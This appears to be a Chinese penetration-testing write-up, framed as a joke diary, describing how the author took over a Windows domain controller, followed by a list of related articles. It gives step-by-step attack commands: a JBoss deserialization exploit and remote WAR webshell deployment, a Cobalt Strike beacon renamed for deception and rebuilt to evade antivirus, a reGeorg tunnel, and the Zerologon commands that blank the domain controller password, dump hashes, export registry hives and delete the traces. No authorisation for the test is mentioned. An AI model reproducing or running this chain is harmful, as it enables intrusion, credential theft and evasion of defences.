牛红红的日记(平平无奇拿下域控)
牛红红的日记(平平无奇拿下域控)
注:本文首发地址:https://www.sec-in.com
文章作者为-句芒安全实验室-成员之一,欢迎微信搜索关注我们。
一、引文
x年x月x日 晴
我是一只牛,家里的老大,我叫牛红红,我还有六个兄弟,分别是橙黄绿青蓝紫。后来我知道这名字是一个头上带着葫芦的算命的老头起的,长大后我问他为什么要起这个名字,老头说当年他爷爷被妖精抓走,于是他便怒气冲冲的去解救,上去便是一句:“妖精!还我爷爷!”没想到妖精和颜悦色的问了他一个问题,他一直苦苦思索,始终没有结果,说着便给我看了一张他珍藏多年的图片。
他希望我不会重蹈覆辙。我心疼老头这么大年纪,身体又弱,便问老头有什么能帮他的吗,老头颤颤巍巍的坐到了一块石头上,抽了口烟和蔼的望着我,
说:我多年来游走各地,最近我得到了一些线索,可能存在答案,你帮我看看吧。
线索:
二、正文
步骤一: 获取网站权限
我根据老头给的线索进行了访问,发现是一个JBOOS控制台。
一瞬间我的脑海闪过很多想法,于是我用了最简单的一种方法,老头,你这线索的利用的工具给我用用呗,经过软磨硬泡终于从老头那骗来了java反序列化终极测试工具。发现目标存在命令执行漏洞,存在域控。
但是发现老头给的工具部分命令执行不完整,没办法,看来得先获取一个webshell。
方法一:利用此工具上传上传webshell至网站根目录。
利用工具自带文件管理功能,找到文件web目录
C:\BAG\JBOSS\jboss-4.2.3.GA\server\default\deploy\jmx-console.war
利用上传功能上传至指定目录。
方法二:
利用现成的工具,参数-u后面加目标地址可以直接获得一个交互式shell
方法三:远程部署获取webshell
1.将shell.jsp文件压缩为zip文件,更改后缀为war文件
2.将shell.war上传到远程服务器上,在该目录下利用python临时开启一个http服务
python -m SimpleHTTPServer 8000 #Python 2
python -m http.server 8000 #Python 3
访问地址,可以看到服务开启成功
3.访问目标控制台http://1.2.3.4/jmx-console
搜索关键字jboss.deployment找到flavor=URL,type=DeploymentScanner点进去
之后搜索关键字void addURL(),找到远程部署地址填写框,如下图
填写完成后点击invoke,若成功会提示部署成功,点击下图中的Back to MBean View
可以查看部署的物理路径
点击应用更改,会跳转到部署好后的访问地址
4.使用冰蝎测试连接
获取webshell结束。
步骤二: 获取服务器权限
利用获取的webshell上线cs的木马。
1.服务器运行CS服务端
./teamserver IP 密码
2.本地运行CS客户端,添加一个监听器,并生成windows后门
添加监听器
生成windows后门
attacks->packages->Windows Executable
选择监听器
生成完毕后改个名字,增加迷惑性
3.利用冰蝎上传文件
cmd下运行
查看服务端未上线,dir再次查看,文件消失,猜测目标可能开启安全防护软件。
利用CS插件bypassAV快速生成一个后门文件
上传,执行,上线。
右击interact获取beacon
步骤三: 获取域控主机权限
由于之前已经确定了域控IP,为了更快拿下域控,遂决定尝试下MS14-068,失败,目标不存在漏洞。
MS14-068具体利用方法,可以参考链接地址:
MS14-068漏洞复现 https://blog.csdn.net/lhh134/article/details/104139081
本机翻了一下没有发现有价值的线索,接着转变思路,看能不能从其他机器上获取有用的东西,利用抓取到的hash尝试登陆其他机器,失败。
继续按照此思路对内网存活机器常见端口进行探测看是否存在ms17010漏洞或者弱口令的主机。
为方便后续测试,搭建一个代理。上传常见的几个代理软件(注意部分服务器可能会限制只允许80、443端口流量通过),发现被杀后决定使用reg,
利用webshell将对应语言的版本上传到网站根目录,
本机运行如下命令,开启代理
$ python reGeorgSocksProxy.py -p 8080 -u http://目标网站/tunnel.jsp
-p #指定监听本地的端口
-u #指定脚本的连接地址
修改本地的proxychain的配置文件,kali下默认位置为/etc/proxychains.conf
测试下是否可以正常使用,执行命令
proxychain curl ipinfo.io
如下图可访问并获取到了代理地址的IP
利用代理探测下弱口令
大约在这个时间点,有别的事情处理,就把资料简单整理了一下,权限也放着没动。
过了N久以后,等我有时间的时候想起这个,刚好在这期间出现了新的域控漏洞,估摸着时间也出来没多久,对方不会这么快,于是再次尝试域提权漏洞,根据网上公开的利用方式
第一步,探测目标是否存在漏洞,发现存在漏洞
proxychains python3 zerologon_tester.py XXX013 10.0.19.13
第二步,将目标域控密码置空
proxychains python3 cve-2020-1472-exploit.py XXX013 10.0.19.13
第三步,利用impacket下的secretsdump.py脚本获取域控hash
proxychains python3 secretsdump.py xxx.local/XXX013\$@10.0.19.13 -just-dc -no-pass
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-57Cj72Rw-1617345994272)(/img/sin/M00/00/5D/wKg0C2A4ZDaAT82PAAEzvaOtNHw660.jpg)]
第四步,利用impacket下的wmiexec.py脚本获取一个域控的shell,直接利用powershell将域控上线到cs,到此步骤获取了域控权限,已经可以登录任意域内成员主机。另外为避免脱域还需要把原先的hash还原回去。
第五步,利用获取的shell,提取域控原始hash。
在shell中依次执行以下命令,保存文件-下载文件-删除文件
reg save HKLM\SYSTEM system.save #利用注册表导出hash并保存为system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save #下载文件system.save到本地
get sam.save
get security.save
del /f system.save #删除文 system.save
del /f sam.save
del /f security.save
提取出原始hash
python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
第六步,根据提权到的原始hash对域控进行还原,避免脱域。
python3 reinstall_original_pw.py XXX013 10.0.19.13 5e80d11de2760cc86ec02b67a544e269
第七步,再尝试下是否能用空密码登录,不能登录则代表还原成功。
到此,域控获取结束。
三、尾结
本次的流程:
1.获取网站权限-2.获取服务器权限-3.搭建内网代理-4.利用域控漏洞获取域控权限
最后,通过搜索,我得到了文件《X友有关葫芦娃爷爷名字的推测.doc》。
抱着忐忑的心情我缓缓的点开了文件:
牛红红的日记(平平无奇拿下域控)相关推荐
- AD DS 域控与成员计算机的时间一致性
一.工作组下的计算机与TENKNET时间同步 我们经常会发现计算机的时钟(日期和时间)不正确了.这种情况有时候是人为现象,有时候是计算机的问题.对于工作组下的PC机,时钟的偏差可能影响不大,经常关机而 ...
- 域控-笔记二(域权限,域组,域管理,Kerberso 协议)
文章目录 一. 域环境搭建 1.1 添加AD功能 1.2 安装 1.3 部署 二. 如何加入域 2.1 加入域 2.2 域中主机登录 2.3 退出域 2.4 添加域用户 三. 域权限 3.1 A-G- ...
- 咋搭建域控服务器,Active Directory虚拟机搭建域控服务器环境
前言 还是和上一章一样,痛苦过后还是记录下给后来人提供便利为妙. 虚拟机选择:建议Hyper-V或者VMware 系统选择:建议WIindows Server 2003及以上 我这里是使用VMware ...
- 域控服务器怎么导出,windows 2003 域控服务器导出全部hash的方法
天下文章一大抄,我也是醉了... 一份"错误"的文章一遍又一遍的被转载,盲目转载,根本不细看.只会误导新手. 谈下windows2003域控下如何导出全部的hash信息. 1. 使 ...
- 无域控AlwaysOn实战教学 (一)
前言 最近正好给客户安装部署无域控的Always On .详细说明下安装部署的细节和碰到的坑.欢迎各位同学拍砖和评论,有什么问题都可以在下面留言. 什么是Always On SQL Server 20 ...
- 懒人修仙传ce修改方法_凡人修仙传:韩立被吐槽其貌不扬,又是“平平无奇古天乐”?...
秉持着精彩的打斗不能断片的原则,<凡人修仙传>将12集中韩立和封岳的打斗场景又安排在了第13集的片头,虽然让部分观众颇有怨言,直呼很水,但总算给了这段打斗一个完整的场面.凡人下半季的开场一 ...
- 小心看上去平平无奇的陷阱:如何防范高级渣?
文章目录 小心看上去平平无奇的陷阱:如何防范高级渣? 高级防渣,防的是什么? 第一种:自我感动渣 第二种:偏执控制渣 第三种:全面依赖渣 如何防范高级渣? 底线思维,了解一下 爱情锦囊 小心看上去平平 ...
- 读论文:基于自监督知识的无监督新集域适应学习
标题: 基于自监督知识的无监督新集域适应学习 作者: 汪云云 , 孙顾威 , 赵国祥 , 薛晖 文章目录 ==Abstract== ==Introduction== ==综述== 一.相关工作 1.1 ...
- 空间三角形_玄关三角形沙发不靠墙,这设计真牛,直接解决无玄关空间少的问题...
玄关三角形沙发不靠墙,这设计真牛,直接解决无玄关空间少的问题 玄关是现在家居中比较常见的区域,一般情况下,家家户户进门位置都会有一个小玄关,更换鞋帽比较方便.不过有的户型也没有玄关,这种格局在设计的时 ...
最新文章
- php curl cookiejar,php使用CURL不依赖COOKIEJAR获取COOKIE的方法
- linux编译openssl
- 程序员修神之路--分布式缓存的一条明路(附代码)
- hdu3530Subsequence【单调队列优化dp】2010多校联合
- B站COO李旎:超2000万人在B站看纪录片
- Java:源文件名、公共类名、main()方法之间关系
- RTM-DSP项目总结
- 数据库连接池和线程池比较
- numpy中的对应元素相乘,可以使用广播
- 项目管理的前路怎么样?PMP证书作用如何?
- 信息安全工程师(软考资料)
- 俄罗斯独立自主的计算机技术和计算机网络
- 酒店客房管理信息系统
- Harbor 核心服务不可用---故障排除
- 英语一2011 阅读四
- Python生成n位随机数字字符串
- js获取传统节假日_js判断节假日实例代码
- C++ SLT中的容器学习与函数谓词
- 阿里资深架构师推荐:浅谈异地多活及阿里云容灾经验分享
- alert弹出[object Object]解决方法
热门文章
- 用万字长文聊一聊 Embedding 技术
- 腾讯开源 TurboTransformers:自然语言处理推理加速工具
- ubuntu16安装mysql8.0
- Elasticsearch 实例管理在京东的使用场景及演进之路
- 常见的 OOM 原因及其解决方法(OutOfMemoryError)
- leetcode 622. Design Circular Queue | 622. 设计循环队列(Ring Buffer)
- leetcode 390. Elimination Game | 390. 消除游戏(Java)
- C#中重写(override)和覆盖(new)的区别
- 汇编语言 利用ASCII以及AND OR进行字符串大小写转换
- 响应式关系数据库处理R2DBC